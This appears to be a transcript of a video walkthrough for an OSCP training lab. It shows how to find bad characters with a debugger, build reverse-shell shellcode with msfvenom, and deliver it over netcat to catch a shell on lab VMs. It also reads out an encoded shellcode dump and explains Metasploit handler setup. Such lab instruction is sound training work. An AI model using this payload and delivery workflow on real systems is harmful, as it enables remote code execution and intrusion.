Hello and welcome. This video is aimed at people who are currently doing the PEN 200 course from Offensive Security in preparation for the OSCP exam. If you're not doing the course, this video won't be much use to you. More specifically, this is a walkthrough for exercise 3 in section 11.2.8. Over on Discord, I've seen that a lot of people get stuck on this, so I wanted to put all the information in one place rather than having the same conversation over and over again. This section is part of the Windows buffer overflows topic. However, this exercise doesn't actually involve a buffer overflow, which has confused a few people. That means that the normal technique won't work. If this application was vulnerable to a buffer overflow, then I'd start with fuzzing. In other words, I'd send through a large amount of data which would overwrite the function's return address on the stack. The app would then crash when my data got loaded into the EIP register. At that point, I could look at the stack by doing a memory dump from the ESP register. In this case, it's a bit different. The application will read in the contents of your exploit.txt file. It will then mangle the contents if certain bytes are present. Those bytes are the bad characters. It will copy what's left to a new area of memory, then update the EBX register to point to this area of memory. Finally, it will run whatever's left by using the call EBX instruction. So, that means that you need a different process for solving this exercise. Normally, you'd have a buffer, then the EIP address, then your shellcode. However, in this case, you can forget about the buffer and the EIP register. Instead, you need to start by putting all possible bytes into the exploit.txt file. Next, you run the immunity debugger and open the exe file. You put a breakpoint on the call EBX instruction, and when you hit that breakpoint, you look at the memory dump for the EBX register. You then compare what's in memory with the contents of the txt file to see what's missing. Those are your bad characters. Once you've identified all the bad characters, you can use MSF Venom to generate shellcode. You put this shellcode into exploit.txt, then the exe file will run it. Test it with the local copy of the exe file first, then use it against VM1 to get the flag. This might be enough information for you to do the exercise on your own, and I'd encourage you to give it a go. However, if you're still stuck, then I'll go through it step by step. So, let us begin. Copy the file. First things first, make sure that you're logged into the VPN and the portal. You will then need to start up the VM group. Please note that there are 4 VM groups and 4 exercises, so you need to pair them up. In this case, we are working on exercise 3, so we need to start VM group 1. This will take a little while to start up, so I'll skip ahead. Now that the group has started, you can click on the IP address to get the credentials. Please note that there are 2 virtual machines in this group with different IP addresses. In this case, VM1 has the IP address 192.168.146.60 and VM2 has the IP address 192.168.146.10. However, this will depend on your VPN connection. The next step is to log into VM2 using RDP. There are a few different programs that you can use for this, but I generally use RDesktop. You need to specify the username, the password and the IP address. You got all of this information from the portal just now. The first time you connect, it will ask you to trust the certificate. Then, when you log in, the VM will ask you to configure network discovery. I found that it always gets stuck at this stage. I don't know why, but the simple solution is to close the remote desktop session, then run the same command again to reconnect. Going back to the portal, the question says, to assist with testing and practice on your Windows client, you can download bad characters windows1.exe from the VM-1 web server on port 80. That's the next step, and there are 2 ways to do this. The first way is to use a web browser. So, you can run Edge, then type in the IP address for VM1. In this case, that's 192.168.146.60. It will show you a list of files, so click the file name to download it. Another method is to use PowerShell. You can do it as a one-liner, but I like to split it into two commands. The first command creates a web client object. The second command will use that object to download a file. Whether you use the browser method or the PowerShell method, you will end up with a copy of the exe file in your downloads folder. As part of my normal workflow, I display all file extensions in Explorer. If I used a web browser for the download, I will also unblock the file to remove the mark of the web. That might not be necessary here, but I think it's a good habit. Now go to a command prompt and run the application. This will display a banner on the screen which tells you that it's looking for a file called exploit.txt. Go back to Explorer, then create a new text document in this folder called exploit.txt. Now go back to the command prompt and run the application again. This time the banner has changed, so you can see that it's reading in the contents and executing the shellcode. It's then crashed, which is what I'd expect, because the exploit.txt file doesn't actually contain any shellcode. Setting a breakpoint. At this point, you can minimize the command prompt window and the Explorer window. Just leave the PowerShell window open and visible. I'm also going to maximize the RDP window. Run Immunity Debugger. Then open the executable file. If you look in the bottom right corner, you will see that the execution is paused. You now need to set a breakpoint on the call EBX instruction, but first you have to find it. There are two ways to do this. The first way is the simplest. Go to the top left quarter of the screen where you have a list of instructions. Press Ctrl F, then type in call EBX, then press enter. This will show you the first match, and you can toggle the breakpoint on and off by pressing F2. When the breakpoint is active, the memory address will be highlighted in light blue. The second way is more thorough. As you can see from the selected instruction, the corresponding opcode is FFD3. You can use Mona to search for this in the current module. So, go down to the bottom and type in !Mona space find space -s space double quote \x ff \x d3 double quote space -m space double quote, then the file name bad characters windows -1.exe double quote and press enter. This shows 16 results, and in theory we might need to inspect them all. However, in this case that's not necessary. Press Ctrl and F6 to switch back to the main screen. Looking at the list of instructions, the right-hand column contains some ASCII strings. We can make this window a bit wider by dragging it so that we can see the full strings. Now scroll up a bit in the list of instructions. A few lines above the breakpoint, it has the same string we saw in the banner, which says executing your shellcode now. Based on that, we know that we're in the right place. So, press F9 to run the application. This will pause again, verify that the EIP register contains the address of the call EBX instruction. Press F9 again and verify that the application crashes. It is trying to run an empty file. Checking for bad characters. Now we get to the point of this exercise, checking for bad characters. In Kali, use a Python script to create a new copy of exploit.txt. This will contain every possible byte from 00 up to FF. I have a template for this, and you might want to pause the video so that you can make a copy. It starts with the shebang, specifying that it uses Python 3. Be aware that Python 2 and Python 3 behave differently when it comes to character encoding, so I'm using byte strings with a B before the double quote. There are 16 rows of 16 bytes, and each byte has \x before it to specify that it's a hexadecimal value. I'm then opening the exploit.txt file. I use WB for write binary rather than WT for write text. I put my byte string into the file and then I close the file. I'll use ls to show the file attributes. The script is executable, so I can run it directly, and this creates the exploit.txt file. I can use the xxd utility to inspect the contents of this file. I'm using -G1 so that all the bytes are spaced out, rather than having them paired up. The middle column shows all the bytes from 00 to FF, which is exactly what I wanted. The right-hand column shows the corresponding ASCII characters, but these are only a subset of the overall list. For instance, byte 07 is the bell, which isn't a printable character. I now need to transfer this file from Kali to Windows. In Kali, I'll start a Python web server. This will run on port 8000 by default, but I'm using port 80 just in case there's an outbound firewall on the target machine. I don't think that's an issue in this exercise, but it's a good habit in general. In Windows, I'll use PowerShell to download the file. I can use the same web client object as before. Now that I've copied it across, I can check the SHA-256 hash to verify that it's identical in both places. In Kali, run SHA-256 sum followed by the file name. In Windows, run get-filehash. I'm specifying the algorithm and the file name. You can do an eyeball inspection to compare these hashes, or you can store them both in local variables. Let's use PowerShell for that. First, I'll copy over the hash from Kali. Second, I'll copy the hash from PowerShell. Now I can compare them. This returns true, so we know that the file was transferred successfully. Note, the PowerShell comparison is not case sensitive, so it doesn't matter that one of them's uppercase and the other is lowercase. Now we need to test the new exploit.txt file. Close Immunity, then run it again, and reopen the exe file. We can click the recent items on the file menu for this rather than browsing for it again. Press F9 to run the application, and it will pause on the call EBX instruction. We don't need to recreate the breakpoint every time because Immunity remembers it. Now right-click the EBX register and click Follow in Dump in the pop-up menu. Ideally, we should see the contents of our file here. However, they look completely different. That's because the first byte in the file was 00, which is the null byte. That's being treated as end of file and everything else is ignored. So, we found our first bad character. In the vast majority of cases, you can assume that 00 is a bad character, so some people don't even bother testing it at all. However, I personally like to include it just to be thorough. We now need to remove that byte from the file and try again. So, go back to Kali and edit the Python script. Delete that byte, but make a note of it for later. Save the file and exit. Then run the script again. If we run xxd again, we can see that the sequence has changed. it now starts at 01 rather than 00. Go back to Windows and download the file again. We can use the same PowerShell command as before. As before, we need to close Immunity and reopen it to test the new copy of the file. So, same steps again. We press F9 to run the file, then it will pause in the breakpoint. We look at the memory dump for the EBX register, and this time it looks a lot more encouraging. At a glance, there's a continuous sequence, but we need to check it. This is a tedious job where you need careful attention to detail. Take each row in turn, going from left to right. First row, 01, 02, 03, 04, 05, 06, 07, 08. So that's all correct. Second row, 09, 00, 0B. Hang on, what happened to 0A? It's been replaced by 00, so we found our next bad character. This makes sense because 0A is the new line character, and the banner said that it would stop reading on \n. So, we add 0A to our list of bad characters and repeat the process. In Windows, we close the Immunity debugger. In Kali, edit the Python script and remove the \x 0A byte. Save the changes, exit from here, and rerun the script. This will create a new copy of the exploit.txt file. In Windows, we download a new copy of the exploit.txt file, and we can just press up, then enter in PowerShell to achieve that. We don't need to check the file hashes every time because we've already established that the file copy process is working correctly. Run Immunity again and open the exe file. Press F9 to run the application until we hit the breakpoint. Check the memory dump for the EBX register. We can pick up where we left off rather than starting from the beginning. Second row has 09, 0B, 0C, 0D, 0E, 0F, 10, 11. That's correct. Next row, 12, 13, 14, 15, 16, 17, 18, 19. Next row, 00. That's another bad character. That should be 1A. So we add that to our list and we start again. It's worth noting at this point, in theory you could check all the way through the list for anything that appears as 00. For example, looking ahead, we can just see there's one down here for A7. So we could just say at this point, well, we know that A7 is a bad character. However, that's not necessarily the case. That might just be a side effect of 1A, for example, being a bad character. Maybe there's some weird behavior where it says, okay, remove this character and then remove every 12th byte afterwards. So the best way to be sure is, unfortunately, the most tedious method. You remove one byte at a time and then repeat the process until you've got them all. So we go through the cycle again. Hopefully this process is now starting to feel familiar. In Windows, we close the Immunity debugger. In Kali, edit the Python script and remove the \x 1A byte. Save the changes, exit from here and rerun the script. This will create a new copy of the exploit.txt file. Back in Windows, we download a new copy of the exploit.txt file. Run Immunity again and open the exe file. Press F9 to run the application until we hit the breakpoint. Check the memory dump for the EBX register. And we were up to the ones last time. So 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A we know is a bad character, 1B, 1C, 1D, 1E, 1F, then on to the 2s, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 2A, 2B, 2C, 2D, 2E, 00. So 2F is our next bad character. Add that to our list, then do another iteration. In Windows, close the Immunity debugger. In Kali, edit the Python script and remove the \x 2F byte. Up at the end here. Save the changes, exit from here and rerun the script. Back in Windows, download a new copy of the exploit.txt file. Run Immunity again and open the exe file. Press F9 to run the application until we hit the breakpoint. Then check the memory dump for the EBX register. We've just finished the 2s, so we can start with the 3s. And at this point, I think it's easier just to read out the final digit of each byte. So 30, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F, 40, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F, 50. Scroll a bit. 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F, 60. 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F, 70. 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F, 80. Scroll a bit more. 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F, 90. 1, 2, 3, 4, 00. So 95 is missing, and that's our next bad character. We add that to our list, then we go round again. In Windows, close the Immunity debugger. In Kali, edit the Python script and remove the \x 95 byte. Save the changes, exit from here and rerun the script. Back in Windows, we download a new copy of the exploit.txt file. Run Immunity again and open the exe file. Press F9 to run the application until we hit the breakpoint. Check the memory dump for the EBX register, and we're up to the 9s. So 90, 1, 2, 3, 4, 95 is a bad character, 6, 7, 8, 9, A, B, C, D, E, F. A0, 1, 2, 3, 4, 5, 6, 00. So A7 is our next bad character, and that's the same bad character that we noticed earlier. So add that to the list and we go again. In Windows, close the Immunity debugger. In Kali, edit the Python script and remove the \x A7 byte. save the changes, exit from here and rerun the script. Back in Windows, we download the exploit.txt file again, run Immunity, open the exe file, press F9 to hit the breakpoint, and do a memory dump of the EBX register. And we're up to the A's. So A0, 1, 2, 3, 4, 5, 6, A7 is a bad character, 8, 9, A, B, C, D, E, F, B0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F, C0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F, D0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F, E0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F, F0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F. That's FF. We have made it all the way to the end of the list, and we have identified all the bad characters. So, our final list is 00, 0A, 1A, 2F, 95 and A7. Shellcode. Now that we've identified the bad characters, we can generate shellcode. So, go back to Kali and run MSF Venom. There are a few points to note here. The architecture and the platform aren't compulsory, but this gets rid of warning messages. I'm using an unstaged payload, so it's shell underscore reverse TCP rather than shell / reverse TCP. My lhost address matches the IP address of the TUN0 interface from the VPN connection. I'm using a low numbered port for LPort just in case there's an outbound firewall on the target machine. This is the same principle that I used earlier for the Python web server. I'm using Python format and I'm changing the default variable name from buff0 to shellcode. I'm specifying the Shikata Ganai encoder. That's optional. I could just let MSF Venom choose its own encoder. And finally, I'm specifying the list of bad characters, which we identified earlier. You will note I am not outputting this to a file. I am just going to display the results on the screen. It takes a moment, and then it comes up. So, this is completed successfully, and it's generated Python code for me to use. I will take this and copy it to the clipboard. I will now create a new script, which is very similar to the previous script that I used to identify the bad characters. As before, I will specify a shebang to force this to use Python 3. I will then paste in the contents of the clipboard, which gives me the shellcode byte string. And finally, I'll add the code to save this to a file. So, save the script, exit from here, and then use chmod to make this executable. I can now run the script, and that will create a new copy of exploit.txt. As before, I can use xxd to verify the contents of this file. I'm specifying 8 columns here rather than 16 so that it will match what's in the debugger. That will make the next stage a bit easier. If I scroll up here, just looking at the first line of the output from MSF Venom, it goes BA E8 9F, and down here it is also BA E8 9F. So, I am confident that the Python script worked correctly at this stage. Now I need to do the same thing as before. Close Immunity, download a new copy of the file on Windows, rerun Immunity, open the exe file, press F9 to hit the breakpoint, and check the contents of the memory dump for the EBX register. At this point, you could just run the shellcode and see what happens for the YOLO approach. However, if you want to be cautious, then it's best to do another check for bad characters. I've seen some machines where a particular byte shows up fine in the sequential list, but then it doesn't show up properly at this stage. For instance, 1718 might be okay, but 5318 comes out as 530. In other words, some bytes can be good or bad depending on what they're next to. However, that means that you need to treat them as bad all the time and tell MSF Venom to exclude them. Unlike previous iterations, these bytes aren't sequential, so we need to compare the memory dump to the output of XXD. I'll resize the RDP window and the terminal window so we can have them both on screen at the same time. I will now go through one line at a time. So, BA, E8, 9F, BF, 88, DB, CC, D9. Next line. 74, 24, F4, 58, 31, C9, B1, 52. Next line. 31, 50, 12, 83, E8, FC, 03, B8. Next line. 91, 5D, 7D, C4, 46, 23, 7E, 34. Next line. 97, 44, F6, D1, A6, 44, 6C, 92. Next line. 99, 74, E6, F6, 15, FE, AA, E2. Next line. AE, 72, 63, 05, 06, 38, 55, 28. Next line. 97, 11, A5, 2B, 1B, 68, FA, 8B. Next line. 22, A3, 0F, CA, 63, DE, E2, 9E. Next line. 3C, 94, 51, 0E, 48, E0, 69, A5. Next line. 02, E4, E9, 5A, D2, 07, DB, CD. Next line. 68, 5E, FB, EC, BD, EA, B2, F6. Next line. A2, D7, 0D, 8D, 11, A3, 8F, 47. Next line. 68, 4C, 23, A6, 44, BF, 3D, EF. Next line. 63, 20, 48, 19, 90, DD, 4B, DE. Next line. EA, 39, D9, C4, 4D, C9, 7920. Next line. 6F, 1E, 1F, A3, 6-3, EB, 6B, EB. Next line. 6-7, EA, B8, 8-0, 9C, 6-7, 3F, 4-6. Next line. 1-5, 3-3, 6-4, 4-2, 7D, E7, 0-5, D3. Next line. DB 4-6, 3-9, 0-3, 8-4, 3-7, 9F, 4-8. Next line. 2-9, 2-3, 9-2, 1-3, 2-6, 8-0, 9F, AB. Next line. B6, 8E, A8, D8, 8-4, 1-1, 0-3, 7-6. Next line. A5, DA, 8D, 8-1, CA, F0, 6A, 1D. Next line. 3-5, FB, 8A, 3-4, F2, AF, DA, 2E. Next line. D3, CF, B0, AE, DC, 05, 16, FE. Next line. 7-2, F6, D7, AE, 3-2, A6, BF, A4. Next line. BC, 9-9, A0, C7, 1-6, B2, 4B, 3-2. Next line. F1, 7D, 2-3, 4B, 9-3, 1-6, 3-6, B3. Next line. 9-2, 5D, BF, 5-5, FE, B1, 9-6, CE. Next line. 9-7, 2-8, B3, 8-4, 0-6, B4, 6-9, E1. Next line. 0-9, 3E, 9E, 1-6, C7, B7, EB, 0-4. Next line. B0, 3-7, A6, 7-6, 1-7, 4-7, 1C, 1E. Next line. FB, DA, FB, DE, 7-2, C7, 5-3, 8-9. Next line. D3, 3-9, AA, 5F, CE, 6-0, 0-4, 7D. Next line. 1-3, F4, 6F, C5, C8, C5, 6E, C4. Next line. 9D, 7-2, 5-5, D6, 5B, 7A, D1, 8-2. Next line. 3-3, 2D, 8F, 7C, F2, 8-7, 6-1, D6. Next line. AC, 7-4, 2-8, BE, 2-9, B7, EB, B8. Next line. 3592 9D 24 87 4B D8 5B. Next line, 28 1C EC 24 54 BC 13 FF. Next line, DC CC 59 5D 74 45 04 34. Next line, C4 08 B7 E3 0B 35 34 01. Next line, F4 C2 24 60 F1 8F E2 99. Last line, 8B 80 86 9D 38 A0 82. That's the end of the XXD output. There are more bytes in memory, but those are irrelevant for our current purposes. The shellcode was intact, so we haven't identified any additional bad characters. Reverse shell on VM number 2. Now that we know the shellcode is intact, we can test it. We can start by maximising the windows again. In Kali, create a netcat listener on port 443, NC-NVLP 443. This matches the L port value that we specified in the MSF Venom command earlier. In Immunity, press F9 to continue running the application. This time it shouldn't crash. Back in Kali, we can verify that we get a reverse shell. The hostname command matches the RDP session, and so does the whoami command. We can now exit from here, although I found that I had to press Ctrl-C to get back to the bash prompt in Kali. Over in Windows, we can close Immunity, and we can log out of the RDP session, because we're all done with VM number 2. Reverse shell on VM number 1. The final step is to get a reverse shell from the other VM. In Kali, restart the netcat listener on port 443. Next, send the exploit.txt file to VM number 1 via netcat. There are a few important points to note here. Make sure that you include the hyphen after the file name. Make sure that the IP address matches VM number 1. After you run this command, you'll need to press enter a second time to send a new line. Alternately, you could put byte 0A at the end of the exploit.txt file. Now, verify that you have received a reverse shell. In this case, you can see that the incoming IP address does correspond to VM number 1. You can also run the hostname command and the whoami command. So, now that you're on the real machine, you can claim your flag. I will note that the flag is randomly generated every time you revert the machine. So, there's no point copying this one, it won't do you any good. You'll need to follow the instructions I've laid out in this video, and then you'll get your own flag. You can now exit from the reverse shell. This time, you don't need to press Ctrl-C in Kali. Common mistakes. As I mentioned at the start, I see a lot of the same issues cropping up on Discord over and over again. Here are some of the most common. Confusion about the buffer overflow. Since this whole topic is about Windows buffer overflows, it's natural to assume that you'd need to do it here. However, it's important to read the question carefully, otherwise you'll go down a rabbit hole. Double-clicking the file in Explorer. Once you've downloaded the exe file onto Windows, you might double-click it and then say that nothing's happening. In fact, it opened a new window for command prompt, ran the program, and closed the window again, so it just flashed past too quickly for you to see it. If you run the program from a command prompt, you'll be able to read the banner. If in doubt, it's always worth using the command prompt because you can also launch GUI applications that way. I can demonstrate this using Notepad. Duplicate file extensions. By default, Windows will hide extensions for known file types. Let's create a new text document like we did before and call it exploit.txt. Now, when I run the exe file from a command prompt, it should read in the contents of that file and crash. However, it's giving the same error as before, saying that the exploit.txt file is missing. What's gone wrong? If I run dir, the problem becomes clear. You'll see that my new file is actually called exploit.txt.txt. If I go back to File Explorer and view all file name extensions, I'll see the same thing there. Let's try again. I'll delete my new file and hide file extensions so we're back where we started. This time I'll create a new text document, but just call it exploit. If I run dir again at the command prompt, this file is actually called exploit.txt. I can now run the exe file again, and I'll see different behaviour. It reads in the contents of the file, then crashes. However, my advice is to show all file extensions to avoid this type of confusion. As I mentioned earlier, this is the first thing I do whenever I run File Explorer on a new machine. Typing hex codes into a text file. Some people will create a text file with \x01, \x02, etc. Here's one I created earlier, and if I cat the file, then it looks correct. However, when I run xxd, you'll see that all of these values are actually in the ASCII section on the right, not in the hex section in the middle. I've used the default settings for xxd to make this clearer. If you look at the middle section, there are several columns full of 5C78. That's because 5C is the hex code for the backslash character and 78 is the hex code for X. So 5C78 corresponds to \x, 30 corresponds to 0, and 31 corresponds to 1. So that's why you need to use a Python script to generate the exploit.txt file. Python incompatibility. Here's another version of my script to generate bad characters. This time it uses normal strings rather than byte strings, and it uses WT rather than WB. If I run this script with Python 2, it works absolutely fine. I can use XXD to view the output. It has every byte from 00 to FF, which is exactly what we want. If I run this with Python 3, it doesn't generate any errors. As before, I can use XXD to view the output. And the first section looks correct. I have all the bytes from 00 to 7F, including the printable ASCII characters. However, the next section looks a bit strange. It says C280, C281, C282, and so on. A bit later, it has C380, C381, C382, and so on. So, there are C2 and C3 bytes alternating with the real bytes, and the sequence ends at BF rather than FF. So, we get different behaviour depending on whether we use Python 2 or Python 3. More importantly, if we just run Python without specifying a version, we'll get different behaviour depending on the computer. We can check the default version by running Python -v. As a side note, make sure that you use an uppercase V for version rather than a lowercase v for verbose. In this case, Carly is using Python 3.10, whereas the exercise VM uses Python 2.7. That's why I like to put the Python version into the shebang and make the script executable. That way, I know that I'll get consistent results every time, rather than having to remember which version of Python to use. For this specific situation, some people recommend using Python 2 to test for bad characters. However, it's worth noting that Python 2 reached end of life in January 2020, almost 3 years ago. So, I think that it's best to use Python 3 for any new scripts you create. However, as a more general point, you might come across a similar issue when you use existing scripts from ExploitDB. If the script was written in 2014, it was probably designed for Python 2, and you might have issues if you run it in Python 3. In that case, it's easier to run it with Python 2 rather than converting it. Copy-paste into Notepad. Let's say that you've done everything right so far. You've run a Python script in Kali, and XXD confirms it has the correct range of bytes. So, the next step is to copy it over to Windows. Some people have run cat exploit.txt in Kali, then copied the output and pasted it to Notepad on the Windows VM. I can understand why they'd do this, because the file extension is .txt and Notepad is what you'd normally use to edit a text file. However, in this case the file extension is misleading because you're working with binary data. That's why you need to use a different method to transfer the file, such as a PowerShell web client or Netcat. More generally, this is why it's useful to check the SHA-256 hashes after a file transfer to verify that nothing got mangled en route. In this case, we can run SHA-256 sum on Kali, we can also run get file hash on Windows. As you can see, the hashes are completely different. Using the wrong register for the memory dump. Let's assume that you've created the exploit.txt file containing all the bytes from 01 to FF, and you've successfully transferred it to the Windows VM. You've then opened the exe file in Immunity and put a breakpoint on the call EBX instruction. When you hit the breakpoint, you need to get the memory dump for the EBX register. However, I've seen people who either check the ESP register, which would be correct for a buffer overflow, or the EBP register, because the first two letters are the same as EBX. Then they get stuck because they can't find any bad characters. This is especially confusing because EBP is very close to the original data that's loaded in from the text file before it gets mangled by bad characters. So, you could go through the entire list and find every byte intact. In this case, you can see that 0A and 1A are both present here, whereas if we go to the EBX register, follow in dump, they have been replaced by 00. So, make sure that you use the EBX register for this exercise. On a related note, remember what I said earlier about reading the question carefully. There might be other exercises which ask you to use a different register, maybe EAX or ECX rather than EBX. Using Netcat before testing locally. Some people say, I've identified all the bad characters, but when I ran Netcat, I didn't get a reverse shell. My first question is always, did you get a reverse shell from VM number 2? And in most cases, they haven't tried. There are a few reasons why this is important. If it doesn't work on VM number 2, it won't work on VM number 1 either. Also, if it doesn't work on VM number 2, you've got a debugger available to find out what's gone wrong. In addition, you only get one chance to connect to port 4444 on VM number 1, then it will close and you'll have to revert the VM group. For this exercise, that's not too bad, because the bad characters are always the same. However, there are other exercises where the bad characters are randomly generated each time you revert, which means that you'd have to start all over again. Regarding the open port, I can prove this by using nmap. I've just reverted the VM group, so I'll now run the same command twice. This is nmap -p4444, then the IP address 192.168.146.60. The first time I run it, it says that the port is open. The second time I run it, it says that the port is closed. If I now try to send exploit.txt via Netcat, it will say connection refused. And again, that's because the port is closed. By implication, this means that you can't use Nmap to verify that the port is open, because you'll waste your one shot at connecting to it. So this is basically a leap of faith. If you're interested in Greek myths, think of Orpheus in the underworld. He could rescue his wife, but only if he didn't turn around to look at her until they were out. Sending sequential bytes to the exe file. Let's assume that you've identified all the bad characters. So, you now have a copy of exploit.txt containing all the sequential bytes from 00 to FF except for the bad characters. When you hit the breakpoint in immunity, you check the memory dump for the EBX register, and you've verified that everything is intact. However, when you press F9, the application crashes. What's gone wrong? This is because you haven't generated any shellcode yet. So, the application will try to interpret your sequential bytes as opcodes, corresponding to assembly language instructions, but they don't make any sense. So up here in the list of instructions, you can see that the first instruction is 0102, which is interpreted as add dword something. Then the next one is 030405, and it's taking 06, 07, 08, 09 as an argument. The next one is 0B, 0C, 0D, taking 0E, 0F, 1011 as an argument. Then the next one is 1213, and so on. So basically, this is being treated as if it's a program, but it's gibberish, and that's why it fails. You need to run MSF Venom to generate real shellcode in order to get a reverse shell. Misusing the output from MSF Venom. The question mentions that you'll need to jump ahead to section 11.2.11 so that you can learn how to use MSF Venom. The sample commands in that section look like this. So, it's understandable that people would copy the structure. They'll specify their own IP address for lhost and give the relevant list of bad characters for the -b argument, but they'll keep everything else the same. In particular, they'll use -fc and then redirect the output to exploits.txt. However, this won't work. You'll need to take the output and put it into a Python script. You'll also need to adjust the syntax to be in Python format rather than C format, which is why I use -fpy rather than -fc. There's no point doing a manual conversion when MSF Venom can do it for you. You can then use your script to generate exploit.txt as I demonstrated earlier. Using different files in Kali and Windows. Some people will run a Python script locally on VM number 2, then run another Python script in Kali so that they can create exploit.txt for VM number 1. However, as I mentioned earlier, you might get different results from the same script due to different default versions of Python. The whole point of testing is that you want to use exactly the same data in the live system. Otherwise, you're saying, I used file 1 with machine 1 and it worked, then I used file 2 with machine 2 and it didn't work. In that scenario, you don't know whether it's a problem with the file or a problem with the machine. You want to eliminate as many variables as possible for a control experiment. Using a staged payload with a netcat listener. When I ran MSF Venom earlier, I used the shell _ reverse TCP payload. As I mentioned at the time, this is the unstaged version, so it's all in one piece. However, suppose that I used the shell / reverse TCP payload instead. This would specify a staged payload in 2 pieces. To keep this example simple, I'll use raw format and output the results to exploits.txt. I'll then transfer that file over to the Windows VM. In Kali, I'll set up a netcat listener on port 443. Then in Windows, I'll run the executable. As you can see, my netcat listener gets a connection, but then the connection disappears. That's because the first part of the payload is trying to download the second part, but netcat can't provide it. So, you have 2 options. You can use an unstaged payload with a netcat listener, as I demonstrated earlier, or you can use a staged payload with a multi-handler in the Metasploit console. You might be concerned about the second option, due to the Metasploit restrictions in the OSCP exam. However, here's the relevant section of the OSCP exam guide. As you can see, you're allowed to use multi-handler as often as you like, the same as MSF Venom. So, here's how you can do it with the multi-handler. In Kali, run MSF console -Q. -Q means quiet mode, so it will hide the banner. In the console, type use multi/handler, then set payload Windows/shell/reverse_TCP. This matches the payload that you specified in MSF Venom earlier. Show the options. The only options that we need to specify here are lhost and lport. Again, these will match what you used earlier in the MSF Venom command. So, set lhost to match your ton0 IP address, and set lport 443. Run -J to run this as a job. Back in Windows, run the exe file again. In Kali, you can see that it's received the initial connection and sent over the second stage. It's also opened a session. You can list the sessions, and you can interact with the new session. Now you have a reverse shell. So again, either method is fine. I would personally use the unstaged payload in these exercises just because running a Netcat listener is simpler than configuring the Metasploit console. However, you can do whichever you prefer. The important point is that the payload and the listener have to match. Missing out the hyphen in the cat command. This isn't exactly a mistake, but it's something to be aware of. The final stage of the exercise is to send the shellcode to VM number 1. Going back to the question, it specifies the syntax for the target VM. Cat exploits.txt hyphen pipe nc target IP 4444. Then press Ctrl+C to trigger exploit execution. The hyphen is a file descriptor, which corresponds to stood in or stood out, depending on the context. In this case, it means that the output of the cat command is the input for netcat, and the output of the netcat command is going to stood out on the local terminal. I've run my Python script to use the same unstaged payload that I used earlier. I've also reverted the VM group so that port 4444 is open on VM number 1 again. On Kali, I've set up a netcat listener on port 443. I'm now going to send exploit.txt to VM number 1 without using the hyphen. So, I'm just typing cat exploit.txt pipe nc IP address 4444. I've run that, I'm checking the netcat listener, and nothing's happening. So, at this point, you might assume that the process has failed. I'll go back to my cat command, press Ctrl+C. Now I'll check the netcat listener again, and at this point I have a connection. So, in fairness, this is exactly what the question tells you to do. However, I think it's easier if you specify the hyphen, because then you get the reverse shell immediately, rather than having to do Ctrl+C. As a general principle, if the question tells you to use specific syntax, then you should do it. Look closely to make sure that you haven't made any typos. Wrapping up, there are 3 other exercises in this section. They work the same way with different bad characters, so you can apply the same process to each of them. There is another way to find bad characters, which involves the Mona plugin for the Immunity Debugger. Georgia Weidman wrote a good article about that, and I've put a link in the video description. However, that won't work with other debuggers, such as EDB or GDB, so it's worth doing the manual process at least once, just so that you understand how it works. This method will work with any debugger. I've disabled comments on this video, but you can go to OffSec's Discord server if you need extra advice. I've put a link to that in the video description as well. Good luck with the rest of your course!